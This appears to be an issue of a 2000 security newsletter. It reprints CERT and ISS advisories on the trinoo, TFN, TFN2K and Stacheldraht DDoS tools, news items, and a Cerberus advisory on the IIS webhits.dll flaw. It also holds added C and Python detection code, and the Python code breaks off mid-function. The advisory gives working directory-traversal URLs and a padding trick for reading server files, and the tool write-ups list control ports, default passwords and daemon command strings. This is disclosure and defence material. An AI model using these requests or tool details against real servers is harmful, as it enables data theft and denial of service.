To put that in perspective: Rather than using one BB gun to hit a target, a hacker now has the equivalent of 1,000 BB guns, Houle said. Or the effects can be more like a shotgun, said Mike Hagger, vice president of security at Oppenheimer Funds. These tools can "be deadly and can bring a company to its knees in a matter of seconds," Hagger said.

These rogue distributed tools are usually installed on host servers that have been compromised by exploiting known security holes, such as various Remote Procedure Call vulnerabilities, according to CERT.

Trinoo is used to launch coordinated UDP flood attacks from many sources. A trinoo network consists of a small number of servers and a large number of clients. To initiate an attack, an intruder connects to a trinoo server and instructs it to launch an attack against one or more IP addresses. The trinoo server then communicates with the clients, giving them instructions to attack one or more IP addresses for a specified period of time, CERT said.

In addition to UDP flood attacks, TFN can generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcasts or smurf attacks. The tool can generate packets with spoofed source IP addresses. To launch an attack with TFN, an intruder instructs a client or server program to send attack instructions to a list of TFN servers or clients.

In its alert, CERT has issued a number of steps IT managers can take to thwart distributed denial of service attacks. To prevent installation of distributed attack tools on networked systems, users should stay up to date with security patches to operating systems and applications software. IT managers should also continuously monitor their networks for signatures of distributed attack tools. For example, if a company uses intrusion detection systems, IT should tune them to recognize signs of trinoo or TFN activity.
Since a site under attack may be unable to communicate via the Internet during an attack, security policies should include "out of the band communications with upstream network operators or emergency response teams," CERT advised.

@HWA

CERT Advisory: http://www.cert.org/incident_notes/IN-99-07.html

CERT® Incident Note IN-99-07

The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community.

Distributed Denial of Service Tools

Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05)
Thursday, November 18, 1999

Overview

We have received reports of intruders installing distributed denial of service tools. Tools we have encountered utilize distributed technology to create large networks of hosts capable of launching large coordinated packet flooding denial of service attacks.

We have seen distributed tools installed on hosts that have been compromised due to exploitation of known vulnerabilities. In particular, we have seen vulnerabilities in various RPC services exploited. For more information see the following CERT Incident Notes:

  IN-99-04, Similar Attacks Using Various RPC Services
  IN-99-05, Systems Compromised Through a Vulnerability in am-utils

Two of the tools we have seen are known as trinoo (or trin00) and tribe flood network (or TFN). These tools appear to be undergoing active development, testing, and deployment on the Internet.

Descriptions

Trinoo

Trinoo is a distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. For more information about various UDP flood attacks, please see CERT Advisory CA-96.01.

A trinoo network consists of a small number of servers, or masters, and a large number of clients, or daemons. A denial of service attack utilizing a trinoo network is carried out by an intruder connecting to a trinoo master and instructing that master to launch a denial of service attack against one or more IP addresses.
The trinoo master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time.

  1. intruder -------> master;  destination port 27665/tcp
  2. master   -------> daemons; destination port 27444/udp
  3. daemons  -------> UDP flood to target with randomized destination ports

The binary for the trinoo daemon contains IP addresses for one or more trinoo master. When the trinoo daemon is executed, the daemon announces its availability by sending a UDP packet containing the string "*HELLO*" to its programmed trinoo master IP addresses.

     daemon   -------> masters; destination port 31335/udp

The trinoo master stores a list of known daemons in an encrypted file named "..." in the same directory as the master binary. The trinoo master can be instructed to send a broadcast request to all known daemons to confirm availability. Daemons receiving the broadcast respond to the master with a UDP packet containing the string "PONG".

  1. intruder -------> master;  destination port 27665/tcp
  2. master   -------> daemons; destination port 27444/udp
  3. daemons  -------> master;  destination port 31335/udp

All communications to the master on port 27665/tcp require a password, which is stored in the daemon binary in encrypted form. All communications with the daemon on port 27444/udp require the UDP packet to contain the string "l44" (that's a lowercase L, not a one).

The source IP addresses of the packets in a trinoo-generated UDP flood attack are not spoofed in versions of the tool we have seen. Future versions of the tool could implement IP source address spoofing. Regardless, a trinoo-generated denial of service attack will most likely appear to come from a large number of different source addresses.
We have seen trinoo daemons installed under a variety of different names, but most commonly as

  ns
  http
  rpc.trinoo
  rpc.listen
  trinix
  rpc.irix
  irix

Running strings against the daemon and master binaries produces output similar to this (we have replaced master IP address references in the daemon binary with X.X.X.X)

  trinoo daemon          trinoo master
  socket                 ---v
  bind                   v1.07d2+f3+c
  recvfrom               trinoo %s
  %s %s %s               l44adsl
  aIf3YWfOhw.V.          sock
  PONG                   0nm1VNMXqRMyM
  *HELLO*                15:08:41
  X.X.X.X                Aug 16 1999
  X.X.X.X                trinoo %s [%s:%s]
  X.X.X.X                bind
  read                   *HELLO*
  ... rest omitted ...

Tribe Flood Network

TFN, much like Trinoo, is a distributed tool used to launch coordinated denial of service attacks from many sources against one or more targets. In addition to being able to generate UDP flood attacks, a TFN network can also generate TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast (e.g., smurf) denial of service attacks. TFN has the capability to generate packets with spoofed source IP addresses. Please see the following CERT Advisories for more information about these types of denial of service attacks.

  CA-96.01, TCP SYN Flooding and IP Spoofing Attacks
  CA-98.01, "smurf" IP Denial of Service Attacks

A denial of service attack utilizing a TFN network is carried out by an intruder instructing a client, or master, program to send attack instructions to a list of TFN servers, or daemons. The daemons then generate the specified type of denial of service attack against one or more target IP addresses. Source IP addresses and source ports can be randomized, and packet sizes can be altered.

A TFN master is executed from the command line to send commands to TFN daemons. The master communicates with the daemons using ICMP echo reply packets with 16 bit binary values embedded in the ID field, and any arguments embedded in the data portion of the packet. The binary values, which are definable at compile time, represent the various instructions sent between TFN masters and daemons.
Use of the TFN master requires an intruder-supplied list of IP addresses for the daemons. Some reports indicate recent versions of TFN master may use blowfish encryption to conceal the list of daemon IP addresses. Reports also indicate that TFN may have remote file copy (e.g., rcp) functionality, perhaps for use for automated deployment of new TFN daemons and/or software version updating in existing TFN networks.

We have seen TFN daemons installed on systems using the filename

  td

Running strings on the TFN daemon binary produces output similar to this.

  %d.%d.%d.%d
  ICMP
  Error sending syn packet.
  tc: unknown host
  3.3.3.3
  mservers
  randomsucks
  skillz
  rm -rf %s
  ttymon
  rcp %s@%s:sol.bin %s
  nohup ./%s
  X.X.X.X
  X.X.X.X
  lpsched
  sicken
  in.telne

Solutions

Distributed attack tools leverage bandwidth from multiple systems on diverse networks to produce very potent denial of service attacks. To a victim, an attack may appear to come from many different source addresses, whether or not IP source address spoofing is employed by the attacker. Responding to a distributed attack requires a high degree of communication between Internet sites. Prevention is not straightforward because of the interdependency of site security on the Internet; the tools are typically installed on compromised systems that are outside of the administrative control of eventual denial of service attack targets.

There are some basic suggestions we can make regarding distributed denial of service attacks:

Prevent installation of distributed attack tools on your systems

Remain current with security-related patches to operating systems and applications software. Follow security best-practices when administrating networks and systems.
Prevent origination of IP packets with spoofed source addresses

For a discussion of network ingress filtering, refer to RFC 2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing.

Monitor your network for signatures of distributed attack tools

Sites using intrusion detection systems (e.g., IDS) may wish to establish patterns to look for that might indicate trinoo or TFN activity based on the communications between master and daemon portions of the tools. Sites who use pro-active network scanning may wish to include tests for installed daemons and/or masters when scanning systems on your network.

If you find a distributed attack tool on your systems

It is important to determine the role of the tools installed on your system. The piece you find may provide information that is useful in locating and disabling other parts of distributed attack networks. We encourage you to identify and contact other sites involved.

If you are involved in a denial of service attack

Due to the potential magnitude of denial of service attacks generated by distributed networks of tools, the target of an attack may be unable to rely on Internet connectivity for communications during an attack. Be sure your security policy includes emergency out-of-band communications procedures with upstream network operators or emergency response teams in the event of a debilitating attack.

In November 1999, experts addressed issues surrounding distributed-systems intruder tools. The DSIT Workshop produced a paper where workshop participants examine the use of distributed-system intruder tools and provide information about protecting systems from attack by the tools, detecting the use of the tools, and responding to attacks.

  Results of the Distributed-Systems Intruder Tools Workshop

Acknowledgments

The CERT/CC would like to acknowledge and thank our constituency and our peers for important contributions to the information used in this Incident Note.
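The incident note's "monitor your network for signatures" advice boils down to matching the master/daemon traffic it lists: trinoo's control ports (27665/tcp, 27444/udp, 31335/udp) with their fixed strings, and TFN's use of ICMP echo replies as a command channel. The following C program is an added example written for this issue, not CERT's code or anything from the tools themselves; it runs that matching over a handful of constructed packet summaries. The record layout, the field names, the `classify`/`scan` functions and the sample traffic are all assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PROTO_ICMP 1
#define PROTO_TCP  6
#define PROTO_UDP  17

/* One summarised packet as a flow collector or IDS might hand it to a
   rule. The layout and field names are assumptions made for this example. */
struct record {
    int proto;            /* IP protocol number */
    int dport;            /* TCP/UDP destination port; 0 for ICMP */
    int icmp_type;        /* ICMP type; 0 is echo reply (ICMP only) */
    int unsolicited;      /* 1 when no matching echo request was seen (ICMP only) */
    const char *payload;  /* payload as a NUL-terminated string, "" if none */
};

/* Return a label for the first trinoo/TFN indicator a record matches,
   or NULL when nothing in the note's description applies. */
const char *classify(const struct record *r)
{
    /* trinoo step 1: intruder -> master control session */
    if (r->proto == PROTO_TCP && r->dport == 27665)
        return "trinoo: intruder->master control (27665/tcp)";

    /* trinoo step 2: master -> daemon, packet must carry "l44" */
    if (r->proto == PROTO_UDP && r->dport == 27444 &&
        strstr(r->payload, "l44") != NULL)
        return "trinoo: master->daemon command (27444/udp, l44)";

    /* trinoo daemon -> master: "*HELLO*" at start-up, "PONG" to a broadcast */
    if (r->proto == PROTO_UDP && r->dport == 31335) {
        if (strstr(r->payload, "*HELLO*") != NULL)
            return "trinoo: daemon announcement (31335/udp, *HELLO*)";
        if (strstr(r->payload, "PONG") != NULL)
            return "trinoo: daemon availability reply (31335/udp, PONG)";
    }

    /* TFN puts its commands in the ID field of ICMP echo *replies* and the
       arguments in the data. The ID values are picked at compile time, so
       instead of fixing on them we flag echo replies that answer no request
       from our side yet still carry data. The caller must keep that state. */
    if (r->proto == PROTO_ICMP && r->icmp_type == 0 &&
        r->unsolicited && r->payload[0] != '\0')
        return "TFN-style: unsolicited ICMP echo reply carrying data";

    return NULL;
}

/* Run classify() over a batch. Returns the number of flagged records and
   stores up to max of their labels in labels[]. */
size_t scan(const struct record *recs, size_t n,
            const char **labels, size_t max)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        const char *l = classify(&recs[i]);
        if (l != NULL) {
            if (hits < max)
                labels[hits] = l;
            hits++;
        }
    }
    return hits;
}

/* Constructed sample traffic: three benign records, then four indicators. */
static const struct record sample[] = {
    { PROTO_UDP,  53,    0, 0, "constructed dns query" },
    { PROTO_TCP,  80,    0, 0, "GET / HTTP/1.0\r\n" },
    { PROTO_ICMP, 0,     0, 0, "abcdefgh" },          /* reply to our own ping */
    { PROTO_TCP,  27665, 0, 0, "" },
    { PROTO_UDP,  27444, 0, 0, "l44" },
    { PROTO_UDP,  31335, 0, 0, "*HELLO*" },
    { PROTO_ICMP, 0,     0, 1, "constructed args" },  /* nobody here pinged it */
};
#define SAMPLE_N (sizeof sample / sizeof sample[0])

const char *classify_sample(size_t i) { return classify(&sample[i]); }

size_t sample_hits(void)
{
    const char *labels[SAMPLE_N];
    return scan(sample, SAMPLE_N, labels, SAMPLE_N);
}

int main(void)
{
    const char *labels[SAMPLE_N];
    size_t n = scan(sample, SAMPLE_N, labels, SAMPLE_N);
    for (size_t i = 0; i < n; i++)
        printf("flagged: %s\n", labels[i]);
    return 0;
}
```

The port-and-string matches are cheap and precise for the trinoo versions the note describes, but they stop working the moment someone recompiles with different constants; the ICMP rule is the more durable one, and it only works if whatever feeds `unsolicited` actually tracks outbound echo requests, which a stateless packet filter cannot do.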
This document is available from: http://www.cert.org/incident_notes/IN-99-07.html

Articles of interest:

Characterizing and Tracing Packet Floods Using Cisco Routers
http://www.cisco.com/warp/public/707/22.html

Improving Security on Cisco Routers
http://www.cisco.com/warp/public/707/21.html

Internet Security Advisories:
http://www.cisco.com/warp/public/707/advisory.html

Additional info, ISS advisory on Trinoo/Tribe variants:

-----BEGIN PGP SIGNED MESSAGE-----

ISS Security Alert
February 9, 2000

Denial of Service Attack using the TFN2K and Stacheldraht programs

Synopsis:

A new form of Distributed Denial of Service (DDoS) attack has been discovered following the release of the trin00 and Tribe Flood Network (TFN) denial of service programs (see December 7, 1999 ISS Security Alert at http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful than any previous denial of service attack observed on the Internet. A Distributed Denial of Service attack is designed to bring a network down by flooding target machines with large amounts of traffic. This traffic can originate from many compromised machines, and can be managed remotely using a client program.

ISS X-Force considers this attack a high risk since it can potentially impact a large number of organizations. DDoS attacks have proven to be successful and are difficult to defend against.

Description:

Over the last two months, several high-capacity commercial and educational networks have been affected by DDoS attacks. In addition to the trin00 and TFN attacks, two additional tools are currently being used to implement this attack: TFN2K and Stacheldraht. Both of these tools are based on the original TFN/trin00 attacks described in the December ISS Security Alert.

Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or Stacheldraht) on hundreds of compromised machines and direct this network of machines to initiate an attack against single or multiple victims.
This attack occurs simultaneously from these machines, making it more dangerous than any DoS attack launched from a single machine.

Technical Information:

TFN2K:

The TFN2K distributed denial of service system consists of a client/server architecture.

The Client:

The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded. The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program.

The Master Server:

The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time.

The Attack:

The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. Possible methods for detection of these flooding attacks are recommended in the TFN/trin00 December 7, 1999 ISS Security Alert.

TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms.

Stacheldraht (Barbed Wire):

Stacheldraht consists of three parts: the master server, client, and agent programs.

The Client:

The client is used to connect to the master server on port 16660 or port 60001.
Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines.

The Master Server:

The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client.

The Agent:

The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server.

The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines.

The Attack:

Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.
Possible methods for detection of these flooding attacks are discussed in the TFN/trin00 ISS Security Alert published December 7, 1999. Stacheldraht runs on Linux and Solaris machines.

Detecting TFN2K/Stacheldraht related attacks:

ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial of Service attacks that these distributed tools use, providing early warning and response capabilities. RealSecure can reconfigure firewalls and routers to block the traffic. On some firewalls this can be as granular as blocking a particular service or protocol port. In conjunction with the December 7, 1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the communications between the distributed components of TFN and trin00. RealSecure will add signatures to detect TFN2K and Stacheldraht in its next release, which will also include an X-press Update capability to speed future signature deployment.

Additional Information:

ISS worked in coordination with CERT, SANS, and the NIPC. The following is additional information regarding these DDoS attacks:

- - Advisory CA-2000-01 Denial-of-Service Developments
    http://www.cert.org/advisories/CA-2000-01.html
- - SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000
- - http://www.fbi.gov/nipc/trinoo.htm
- - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

About ISS

ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services, and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S. commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 888-901-7477.

Copyright (c) 2000 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/
iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH
OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A
vg77CCVq3W8=
=sMAK
-----END PGP SIGNATURE-----

@HWA

09.0 Teen charged with hacking
~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm

Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria.
BY HOWARD MINTZ
Mercury News Staff Writer

A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities.

According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges.

The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers.

The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system.

Authorities have no evidence that Pentchev used the credit card numbers to commit fraud.

Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards.

In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system.

``He wasn't careful about mopping up after himself,'' Lee said.

Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter.

If convicted, Pentchev faces a maximum penalty of 17 years in prison.

Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.

@HWA

10.0 Major security flaw found on Microsoft product
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exclusive: Major security flaw hits Microsoft
http://www.zdnet.co.uk/news/2000/3/ns-12942.html

Thu, 27 Jan 2000 17:03:47 GMT
Will Knight

More embarrassment for Microsoft security as yet another flaw is discovered. Will Knight brings you this exclusive report.

A British security expert claims to have uncovered a major security flaw in Microsoft's Web server software, Internet Information Server 4 (IIS).

David Litchfield, a Windows NT specialist with British firm Cerberus Information Security, says the latest exploit against a Microsoft product allows a malicious hacker to gain unauthorised access to sensitive files, including cached or stored credit card details, address information, user IDs and passwords.

Of most concern is the way these details can be seized: typing a simple URL into any browser makes it possible to gain access to files on Web servers running IIS that have not been specifically configured to disable the exploit.

According to Litchfield, the situation is serious. "It takes no expertise [to use this technique] at all. It's so easy to exploit, I dare not give out a specific example.
It would just fall into the hands of script kiddies [a copycat who uses someone else's techniques to hack a system]." ZDNet UK News has a copy of the exploit technique.

Thousands of e-commerce Web sites use IIS, prompting Litchfield to warn a number of high profile UK e-commerce sites he believed were vulnerable.

Last year Microsoft suffered a major PR blow when its Hotmail service -- the world's leading Web based email service -- was left open to attack by a similarly simple hacking technique.

But it is not just Microsoft's products that are vulnerable to attack: there have been several security breaches of high-profile e-commerce Web sites illustrating the precarious nature of the fledgling technology. Visa, for example, recently confirmed receiving ransom demands from individuals claiming to be able to bring down their computer system. E-commerce Web site CDUniverse was also struck by a computer hacker who stole hundreds of credit card numbers and published them on the Internet.

Mark Tennant, Microsoft product manager for NT Server, told ZDNet UK News on Thursday that although Microsoft products had made headlines recently for their security flaws, it was to be expected. "This product is a mainstream product with millions of users, obviously with that many users flaws are more likely to be picked up."

Ostensibly that might be true, but to observers, those who see Microsoft products hacked time and again, isn't it a worrying pattern? Tennant disagrees and drew comparisons with Linux "which doesn't have millions of users so you therefore don't hear of this type of issue". He added: "Microsoft is completely committed to security."

Asked if that commitment could guarantee Windows 2000 -- NT's big brother due next month -- would not suffer the same sort of security flaws as its predecessor, Tennant said: "I cannot predict what could happen a month down a line... but we are committed to security."
Litchfield suggests the pressure put on organisations to get online, by both government and software houses, has led to companies leaving themselves wide open to computer criminals. "The World Wide Web is a hacker's paradise," he remarks. "The lure of e-commerce as an effective channel to further promote a business and fuel its success has led to too many companies getting 'connected' too quickly, sacrificing security for speed."

Security consultant Neil Barrett from another security firm, UK Information Risk Management, agrees: "The Holy Grail to any hacker is the remote access exploit. In the past problems with IIS have mainly been denial of service. If this exploit does what it says it does, it's down to how well credit card details are protected on a system, which we know from experience is not very well at all."

As a first defence Barrett advises either an intrusion detection system or encryption or ideally "both".

Full details of the exploit are available from the Cerberus Web site at this address: http://www.cerberus-infosec.co.uk/adviishtw.html and a patch for Internet Information Server 4 may be downloaded from the Microsoft security home page.
@HWA

11.0 Cerberus Information Security Advisory (CISADV000126)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: win2k security list
Date: Jan 26th

Cerberus Information Security Advisory (CISADV000126)
http://www.cerberus-infosec.co.uk/advisories.html

Released           : 26th January 2000
Name               : Webhits.dll buffer truncation
Affected Systems   : Microsoft Windows NT 4 running Internet Information Server 4, all Service Packs
Issue              : Attackers can access files outside of the web virtual directory system and view ASP source
Author             : David Litchfield (mnemonix@globalnet.co.uk)
Microsoft Advisory : http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

Internet Information Server 4.0 ships with an ISAPI application, webhits.dll, that provides hit-highlighting functionality for Index Server. Files that have the extension .htw are dispatched by webhits.dll. A vulnerability exists in webhits, however, that allows an attacker to break out of the web virtual root file system and gain unauthorized access to other files on the same logical disk drive, such as customer databases, log files or any file they know or can ascertain the path to. The same vulnerability can be used to obtain the source of Active Server Pages or any other server side script file, which often contain UserIDs and passwords as well as other sensitive information.

*** WARNING ****
Even if you have no .htw files on your system you're probably still vulnerable!

A quick test to show if you are vulnerable: go to

  http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw

If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable.

Cerberus Information Security's free vulnerability scanner - CIS - now contains a check for this issue - available from the website http://www.cerberus-infosec.co.uk/
*** WARNING ****

Details
*******

This vulnerability exploits two problems and for the sake of clarity this section will be split into two.
1) If you DO have .htw files on your system
****************************************

The hit-highlighting functionality provided by Index Server allows a web user to have a document returned with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebHitsFile argument. webhits.dll, the ISAPI application that deals with the request, opens the file, highlights accordingly and returns the resulting page.

Because the user has control of the CiWebHitsFile argument passed to the .htw file they can request pretty much anything they want. A secondary problem to this is that the source of ASP and other scripted pages can be revealed too. However, webhits.dll will follow double dots and so an attacker is able to gain access to files outside of the web virtual root. For example, to view the web access logs for a given day the attacker would build the following URL:

  http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

Sample .htw files often installed and left on the system are

  /iissamples/issamples/oop/qfullhit.htw
  /iissamples/issamples/oop/qsumrhit.htw
  /iissamples/exair/search/qfullhit.htw
  /iissamples/exair/search/qsumrhit.htw
  /iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to loopback)

2) If you DON'T have any .htw files on your system
**************************************************

To invoke the webhits.dll ISAPI application a request needs to be made to a .htw file, but if you don't have any on your web server you might wonder why you are still vulnerable - requesting a non-existent .htw file will fail. The trick is to be able to get inetinfo.exe to invoke webhits.dll but then also get webhits.dll to access an existing file. We achieve this by crafting a special URL. First we need a valid resource. This must be a static file such as a .htm, .html, .txt or even a .gif or a .jpg.
This will be the file opened by webhits.dll as the template file. Now we need
inetinfo.exe to pass it along to webhits for dispatch, and the only way to do
that is to request a .htw file:

   http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

This will fail, obviously: there is no file on the system with that name.
Notice, however, that we have now invoked webhits. By placing a specific
number of spaces (%20s) between the existing resource and the .htw it is
possible to trick the web service: the buffer that holds the name of the
.htw file to open is truncated, which removes the .htw part, so when
webhits.dll attempts to open the file it succeeds and we are returned the
contents of the file we want without there being a real .htw file on the
system. The code is probably doing something similar to this:

   FILE *fd;

   int DoesTemplateExist(char *pathtohtwfile)
   {
      // Just in case inetinfo.exe passes too long a string
      // let's make sure it's of a suitable length and not
      // going to open a buffer overrun vulnerability
      char *file;
      file = (char *)malloc(250);
      strncpy(file, pathtohtwfile, 250);
      fd = fopen(file, "r");

      // Success
      if (fd != NULL)
      {
         return 1;
      }
      // failed
      else
      {
         return 0;
      }
   }

Here webhits.dll "contains" a function called DoesTemplateExist() which is
passed a pointer to a 260-byte string buffer containing the path to the .htw
file to open, but the strncpy() cuts that down further, dropping whatever was
stored in the last ten bytes (in this case the ".htw" at the end of the HTTP
REQUEST_URI), so when fopen() is called it succeeds. This works because
Windows NT ignores trailing spaces in a file name.

Solution
********
.htw needs to be unassociated from webhits.dll. To do this open the Internet
Server Manager (MMC).
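Whether either request shape from the Details section has already been tried against a server can be checked from the server's own logs, before or after the mapping is removed. The following is an added example, not part of the Cerberus advisory, that reads IIS W3C extended log records and flags any .htw request at all (webhits.dll was invoked), a name padded with spaces before .htw (the truncation trick), and a CiWebHitsFile value that climbs out of the virtual root. The log records are constructed for the demo, and the field layout assumes the date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status fields were selected when logging was set up.

```python
"""Spot webhits.dll (.htw) abuse in IIS W3C extended log records.

Added example for this advisory, not code from Cerberus or Microsoft.
The log records below are constructed for the demo; the field layout is
the one IIS writes with W3C extended logging when the date, time, c-ip,
cs-method, cs-uri-stem, cs-uri-query and sc-status fields are selected.
"""
import re
from urllib.parse import parse_qs, unquote

# Field order used when the log carries no "#Fields:" directive.
DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-method",
                  "cs-uri-stem", "cs-uri-query", "sc-status"]

# A ".." path component in either slash style (the target is NT).
DOTDOT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# An absolute NT path: drive letter, UNC prefix or a leading backslash.
ABSOLUTE = re.compile(r"^([A-Za-z]:|\\\\|\\)")

# Constructed sample log. Record 2 is legitimate hit-highlighting; record 3
# is the traversal from the advisory; record 4 is the "nosuchfile.htw"
# probe; record 5 is the padded-name trick against an existing default.htm.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Server 4.0",
    "#Version: 1.0",
    "#Date: 2000-01-27 00:00:00",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2000-01-27 10:01:02 192.0.2.10 GET /default.htm - 200",
    "2000-01-27 10:01:05 192.0.2.10 GET /iissamples/issamples/oop/qfullhit.htw "
    "CiWebHitsFile=/iissamples/default.htm&CiRestriction=none&CiHiliteType=Full 200",
    "2000-01-27 10:02:11 198.51.100.7 GET /iissamples/issamples/oop/qfullhit.htw "
    "CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log"
    "&CiRestriction=none&CiHiliteType=Full 200",
    "2000-01-27 10:03:40 198.51.100.7 GET /nosuchfile.htw - 200",
    "2000-01-27 10:04:02 198.51.100.7 GET /default.htm" + "%20" * 10 + ".htw "
    "CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log"
    "&CiRestriction=none&CiHiliteType=Full 200",
    "2000-01-27 10:05:00 192.0.2.10 GET /scripts/foo.asp id=1 200",
])


def parse_w3c(text):
    """Yield one dict per record, honouring any #Fields: directive."""
    fields = DEFAULT_FIELDS
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue            # malformed record: skip rather than guess
        yield dict(zip(fields, parts))


def decoded_stem(rec):
    """IIS encodes the stem; '+' and %20 both come back as a space."""
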